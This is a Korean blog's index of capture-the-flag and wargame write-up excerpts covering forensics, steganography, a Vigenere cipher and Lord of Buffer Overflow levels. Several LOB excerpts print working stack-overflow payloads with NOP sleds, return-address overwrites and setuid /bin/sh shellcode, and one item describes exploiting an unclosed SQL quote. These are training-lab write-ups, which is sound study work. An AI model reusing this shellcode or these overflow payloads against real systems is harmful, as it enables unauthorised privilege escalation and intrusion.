Wargame/CTF(Capture The Flag)29

• [CTF] 요즘 CTF를 보며 요즘 CTF 문제들을 보면 많은 문제들이 있다. 기존에는 출제가 되지않았던 문제 유형들도 많이 출제가 되는 것같다. https://ctftime.org CTFtime.org / All about CTF (Capture The Flag) ctftime.org 에서 다양한 ctf 대회 및 write up을 보면 docker와 k8s와 같은 문제들이 다양하게 출제되는 것을 확인할 수있다. 나는 forensic에 관심이 많아 포렌식 문제를 찾아서 풀어보고 하지만 docker와 같은 문제들은 풀어보지 못해서 한번 풀어보려고 확인도 해보고 했다. 매번 느끼는 것이지만 ctf문제를 출제하고 우리가 사용하는 docker와 같은 플랫폼? 등을 이용하여 해킹문제를 만들고하는 것들을 보면 엄청 머리가 좋고 대단한 분들이신 .. Wargame/CTF(Capture The Flag) 2023. 5. 6.

• 

  [Tenable CTF] network forensic 심심풀이 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 개요 Tenable CTF에서 출제된 네트워크 포렌식 문제를 Wireshark를 이용하여 풀어본 내용임. 내용 먼저 PCAP파일을 열어 확인 해보면 다음 내용과 같다. 프로토콜의 종류와 데이터의 양을 보기 위해 해당 내용을 확인해본다. Statistics -> Protocol Hierarchy를 클릭하게 되면 아래의 내용처럼 통신 프로토콜을 확인가능하다. ICMP(Internet Control Messag.. Wargame/CTF(Capture The Flag) 2023. 3. 4.

• 

  CTF forensic(Recovering From the Snap) 문제 요즘 일이 많아서 CTF(Capture The Flag)에 참여하지 못한지 오래된 듯하다... 그래서 혼자 문제들 뭐있나 보다가 ...forensic(file carving)이라는 문제를 보고 오오오오오오!!!!!!!!!!!이거다!!! 라고 생각해서 풀어보았다.. 문제가 생각보다 쉽게 풀렸고 풀이도 여러가지 방법으로 풀어보았다. 점수는 150점이였는데!!! 문제는 There used to be a bunch of animals here, what did Dr. Xernon do to them? 이거였다.한번 풀어보자 첫번째 방법은 foremost를 이용하여 푸는 방법이다.animals.dd 이미지가 주어진다. file 명령어를 이용하여 file animals.dd를 해보면 DOS/MBR boot sect.. Wargame/CTF(Capture The Flag) 2019. 1. 1.

• 

  hackover CTF I AM MANY write up :) 두두두둥 오랜만에 작성하는 Write UP !!! 호호호호호호우 먼저 문제 파일을 받아보면 !!! 이사진이다. 흠... 흐으므므므믐흐읗으흥흥흐읗읗ㅇ흐읗으ㅡㅇ 자 먼저 그냥 binwalk로 확인을 해보자!!! PNG가 2개가 있는 것이 확인되었다.그럼 각나왔다. 바로 010 editor로 간다. 이러한 값들이 나오는 것을 확인할 수 있다.png 헤더 시그니처는 89 50 4E 47 0D 0A 1A 0A 이며 IEND는 PNG의 마지막을 나타내는 것이다.그럼 찾아보자 PNG가 두개가 있는 것을 확인할 수 있다. 이렇게 말이다. 그럼 여기에 있는 PNG를 두개를 따로 저장을 하게 되면 이렇게 나오는 것을 확인할 수 있다.!!! 흐흐흐흐흐흐흫 다음엔 다른문제로 나타나겠습니다.!!!! 넝~~~!!!~~~담~~~~~ Wargame/CTF(Capture The Flag) 2018. 10. 9.

• 

  홀리쉴드 2016? forensic memory :) 어쩌다 보니 찾게 된문제!!! 풀어보자 !! 근데 맞게 푸는지를 모르겠다 :( 문제는 Auth : MalwarePid_C&C_Attacker.Serverex) 123_http://www.naver.com/index.php_1.2.3.4 Hint) No ParameterHint-2) Attacker.Server on the MemoryHint-3) Attacker.Server is pharming Server 이렇게 란다.시작하자 !! 크와아아앙 나와라 ! volatility!!!! 먼저 imageinfo 를 통해 profile과 메모리 덤프파일 생성 시간을 확인 후 pslist명령어를 통해 프로세스 리스트를 확인 해보았다. 보다보니 attrib.exe를 보고 무슨 파일인지 의문 이생겼다.바로 구글로 달려.. Wargame/CTF(Capture The Flag) 2017. 1. 11.

• 

  어디 문제인지 까묵은 문제... 일단 파일있어 풀어본당... 이파일이다.스테가노그래피 문제 같다. 그래서 이번에 사용할 툴은 stegosolve 라는 것이다.구글에 stegosolve를 검색하면 다운받을 수있는 곳이 나온다. 실행을 하면 이러한 창이 나온다! stegosolve를 실행 시키려면 java가 꼭필요하다. 이제 file - open 해보자이렇게 열고 나서 화살표를 눌러보오자!! :) 계속누르다 보면 글자가 보인다.위 사진은 blue plane 5 지만 Gray Bit 까지 넘기면요로코롬 :) 짠!! Wargame/CTF(Capture The Flag) 2017. 1. 11.

• 

  RC3CTF_300_Breaking News 300 - Breaking NewsWe just received this transmission from our news correspondents. We need to find out what they are telling us.file 문제인데 문제의 파일을 받아보면 알집으로 파일을 하나 주고 그것을 풀면 이제 우리가 풀어야 하는 문제 파일들이 나온다. 먼저 헥스로 파일을 확인 해보면 별 특이한 것이 없는 것같다 하나 하나 보던 도중 마지막에 base64로 디코딩이 되어 있는 것 같은 문자열을 발견하고 하나하나 파일에서 그러한 글자만 모아보았다. 총 나온 파일은 5개 chapter 4, 9, 10, 15, 18 이렇게 나왔다. 이제 base 64 decoding 을 해보자 base 64 디코딩을 하니.. Wargame/CTF(Capture The Flag) 2016. 12. 16.

• 

  seccon2016 - Memory Analysis_100 Memory Analysis100 pointsMemory Analysis Find the website that the fake svchost is accessing. You can get the flag if you access the website!!memoryanalysis.zip The challenge files are huge, please download it first. Hint1: http://www.volatilityfoundation.org/ Hint2: Check the hosts filepassword: fjliejflsjiejlsiejee33cnc 이것이 문제인데 ... 파일을 받으면 이미지 파일 하나를 받을 수 있다.힌트 1번을 보면 볼라틸리티를 이용하여 푸는 것같다. 먼저 이.. Wargame/CTF(Capture The Flag) 2016. 12. 13.

• 

  seccon2016 - voip_100 VoIP100 pointsVoIP Extract a voice. The flag format is SECCON{[A-Z0-9]}. 문제 데스네... 파일을 받으면 pcap파일을 받을 수 있다. 파일을 열어보면 와이어 샤크로 열리는데... RTP을 디코드 할 것이다.그럼 RTP란 뭘까?RTP란 실시간 멀티미디어 데이터의 전송을 지원하는 Real Time Protocol다. Analyze라는 메뉴에 들어가면 Decode As는 메뉴를 찾으 수있다. 메뉴를 클릭하면 위와 같은 창이 뜨는데 +라는 표시를 눌러 RTP를 등록 해주면 된다. 그 후 Telephony메뉴에서 RTP에서 Stream Analysis를 클릭하게 되면 이렇게 streaming 되는 것을 볼수있다. 저기서 플레이 streams를 클릭하면 소.. Wargame/CTF(Capture The Flag) 2016. 12. 12.

• SECCON2016 - Vigenere_100 SECCON 2016 Vigenerek: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe 문제이다. Vigenere 암호를 이용하여 풀어야 할거 같다. SECCON{ = VIGENER E p: SECCON{ }c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ |A B C D E F G H I J K L M N O P Q R S T U V W X Y Z { }--------------------------------.. Wargame/CTF(Capture The Flag) 2016. 12. 12.

• roo-me)Command & Control - level 2 -15Poin 파일을 다운 받게 되면 또잉 ch2.dmp라는 덤프파일을 얻을 수 있다.!!! 문제를 해석해보자! 정답은 워크스테이션 호스트네임(즉, 컴퓨터이름)이 정답이란다.! :) 룰루~ 그럼 해보자 필자는 strings 라는 명령어를 사용하여 풀어볼 것이다. strings ch2.dmp | grep COMPUTERNAME Wargame/CTF(Capture The Flag) 2016. 12. 12.

• 

  Hack The Vote forensic 150 - Warpspeed 문제를 다운받아 보면 이러한 사진을 받을 수 있다. 글씨가 찌그러져서 보기 힘들다... 어떻게 풀까 생각을 하면서 노가다로 하나하나 잘라서 풀어볼까 생각을 해봤지만 010editor 라는 프로그램을 이용하여 풀어보기로 했다. 이렇게 파일을 볼수가 있다. JPG.bt를 확인하여 WORD Y, WORD X의 값을 500, 500 으로 변경할것이다. 변경하여 저장을 하게 되면 이렇게 글자를 확인 할 수 있다.!!! 끄읏!!! Wargame/CTF(Capture The Flag) 2016. 11. 24.

• 

  CodeGate 2013 f300 Code Gate 2013 문제를 먼저 보면 파일을 다운 받아보면 docx파일 하나다 ... 생각해보자 ?..... 이러한 문제는 ooXML(office open XML)문제일 가능성이 크다. 오피스 오픈 XML(Office Open XML, OOXML, 오픈XML)은 마이크로소프트가 추진하였으며 2006년과 2008년 두차례에 걸쳐 Ecma 인터내셔널에 유럽 표준(ECMA-376)으로, 2008년에 ISO/IEC에 국제 표준(ISO/IEC 29500)으로 승인되었다. 이 문서 규격은 문서, 프레젠테이션, 스프레드시트를 포함한다. 확장자는 .docx 또는 .docx(문서), .pptx(프레젠테이션), .xlsx(스프레드시트)로 통일되어 있다. -wiki- 먼저 docx파일을 zip으로 확장자 변경 후 확.. Wargame/CTF(Capture The Flag) 2016. 9. 23.

• 

  LOB troll -> vampire 먼저 소스를 보면 앞이랑 다른 점을 많이 볼수 있다. 무엇보다 주소값이 0xbfffxxxx 가 될수 없는 점이다.이게 무엇 이 문제일까? 지금 까지 풀어온 문제의 주소값들을 확인 하면 전부다 bfff인것을 확인 할수 있다. 또 한가지 달라진점은 길이 검사를 하지 않는 다는 것이다. 이를 이용하여 우회하여 보자 gdb 를 들어가서 공격을 하는데 일단 100000이라는 큰수를 대입해여 주소값을 확인해 볼것이다.이렇게 바뀐것을 볼수 있다. 또한 bffe라는 것도 확인할 수 있다. 이로 payload를작성해보자\x90*44(버퍼와 더미) 그리고 주소값 + 다시 \x90 100000 높슬레드를 위한 값 + 쉘코드 쉘이 따이는 것을 확인할 수 있다. Wargame/CTF(Capture The Flag) 2015. 10. 15.

• 

  LOB orge -> troll 먼저 소스를 확인해보자!인자는 2개를 넘을수 없고 argv[1]은 48자 또한 memset으로 초기화가 된다. 그럼 일단 생각을 해보면 기본적으로 파일이름 때문에 argv[0]은 먹고 간다. 그러므로 생각을 해야하는데;;; 파일이름을 심볼릭링크를 이용해서 쉘코드를 등록 하면 어떨까? 저자는 48바이트를 쉘코드를 사용하였다. 이유는 \x2f 즉 / 가있으면 심볼릭 링크를 만들수 없기 때문이다. 이렇게 심볼릭 링크를 걸고 난후 gdb 를 이용해 들어가서 공격을 하고 주소값이 뒤덮인 것을 확인 해보고 주소값을 이용하여 공격을 한다. 물론 심볼릭 링크를 이용한다. 그렇게 되면 core파일이 만들어 지는데 이를 이용하여 진짜 주소값을 구해볼 껀데 core를 gdb 로 확인 하고 x/700s $esp를 하다보면 이.. Wargame/CTF(Capture The Flag) 2015. 10. 15.

• pwnable.kr shellshock 보호되어 있는 글 입니다. 2015. 10. 11.

• 

  LOB orge 코드를 열어보면 argv[0]=file이름이다. 그러므로 파일이름을 77byte를 맞춰주기 위해 심볼릭 링크를 걸어준다. ./까지 포함하므로 75를 한다.나머지는 동일 ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(심볼릭 링크) $(python -c 'print "\x90"*40+"AAAA"+"\x9c\xfb\xff\xbf(주소값)"') $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB darklf 소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다. 일단 앞과 똑같이 진행하고 payload를 작성때 ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB wolfman 다시 문제를 풀면 두둥 전 문제랑 똑같은 패턴이다. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(주소값)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB orc cp명령어 같은 건 무시하고 다시 접속을 하여 문제를 풀면 orc.c를 열어보면 buffer가 40이고 리턴값이 \xbf가 꼭 들어가야 한다고 나온다. gdb를 명령어를 이용하여 메인에 브레이크포인트를 걸고 r $(python -c 'print "\x90"*100을 입력하여 esp값을 바꾸었다.그후 x/100 $esp로 값을 확인하면 90909090들어가 있는 주소를 볼수 있다. payload를 작성해보면 ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret 주소값)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB goblin 접속을 하고 (cp 같은 것은 무시하겠습니다) 소스를 확인 하면 이번에 또한 buffer가 16인것을 확인 할 수있다.먼저 vi 를 이용하여 프로그래밍 GOGO!! 위와같이 #include #include int main(int argc, char *argv[]){long shell;shell = system 주소값;나머지는 동일 하게 프로그래밍을 하고 gcc를 이용해 컴파일을 한다. 이제 system 주소값을 보기위해 gdb를 이용해 들어간후 b main명령어를 이용하여 메인에 브레이크 포인트를 건다.그후 p system이라는 명령어를 이용하여 system 주소값을 확인한다.(프로그래밍할때 입력해야함) 이제 payload를 짜보면 (python -c 'print "\x90"*20+"AAAAA(ebp+8.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB gremlin gate와 마찬가지로 cp명령어를 실행하여 파일을 복사한다. 그후 gremlin.c를 열어 보면 16이라는 buffer로 small buffer라는 것을 알수 있다.그후 gdb를 이용하여 보면 sub 0x10의 값을 확인해보면 16이라는 것으로 dummy 값이 없는 것을 확인 할수 있다. 16바이트를 확보하는 것으로 보이므로 main+3에 브레이크 포인트를 건다. 그리고 프로그램 실행 동시에 인자가 전달되므로 argv[2]의 위치를 알아보기위해 $(python -c 'print "\x90(buffer+sfp값)"*20+"BBBB(ret을 덮어써야할 주소 가들어갈 위치"') $(python -c 'print "A"*241"")을 넣는다 0x42424242가 ret위치로 덮어써야하므로 대충 414141414.. Wargame/CTF(Capture The Flag) 2015. 9. 14.

• 

  LOB gate LOB gate로 접속을 하면 gate와 gate로 접속가능하다. 접속후 확인 하면 파일이 3개있는 것이 확인가능 하다 먼저 cp 명령을 이용하여 gremlin의 권한이 없어 gdb 도 못하는 문제를 해결하자 !cp명령어는 파일을 복사하는 명령어이다. 파일을 복사하고 gremlin.c 를 열어보면 strcpy에서 문제가 발생하는 것을 볼수 있다.페이로드를 생각 해보면 일단 buffer 260(256+sfp)+shellcode+ret주소(buffer주소)를 넣어야한다. gdb로 확인을 해보면 strcpy다음에서 일어나니 b *main+59에 브레이크 포인트를 걸고 r $(python -c 'print "\x90"*200(임의의 값)')을 넣고 x/100x $esp 로 esp값을 확인 하면 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14.

• 

  Challenge 36 - Back Up 문제에 들어가게 되면 저말이 끝이다... 소스를 봐도 아무말이 없다... 그치만 vi 로 작업하던 도중 blackout 정전이 됬다는 것을 짐작 할수 있다. 리눅스 vi를 이용해보면 vi 쓰는 도중 백업파일로 .swp라는 파일이 만들어지는 것을 볼 수있다. 이로 우리는 짐작으로 /.index.php.swp를 입력하면(.은 현재 폴더를 나타냄) good! 이라고 나오고 password 는 md5로 되어 있다고 나온다 이로 REMOTE_ADDR => IP + dlseprtmvpdlwlfmfquswhgkwkglgl을 md5로 해쉬한 값이 password이다. 이로 문제 Clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5.

• 

  Chellenge 39 - ??? 문제를 들어가면 빈칸이다 그럼 소스부터보자!!!소스를 확인 하면 index.phps로 이동 하라 한다. 들어가자! 들어가면 이러한 소스가 나오는데 ... 소스를 분석해보자. 여기서의 mysql_fetch_array()는 에러가 뜨는 mysql_fetch_array() 호출문인 $q=mysql_fetch_array(mysql_query("select 'good' from zmail_member where id='$_POST[id]")); 자세히 살펴보면 id = '$_POST[id] 에서 싱글쿼터가 닫혀 있지 않다. 따라서 에러가 발생하는 문제점을 이용하는 문제이다. 이제 에러 부분을 찾았고 $_POST[id] 에 대한걸 더 분석해보면 여기서 최대길이가 15글자라고 하는 힌트를 얻을 수 있다. $_POST.. Wargame/CTF(Capture The Flag) 2015. 9. 5.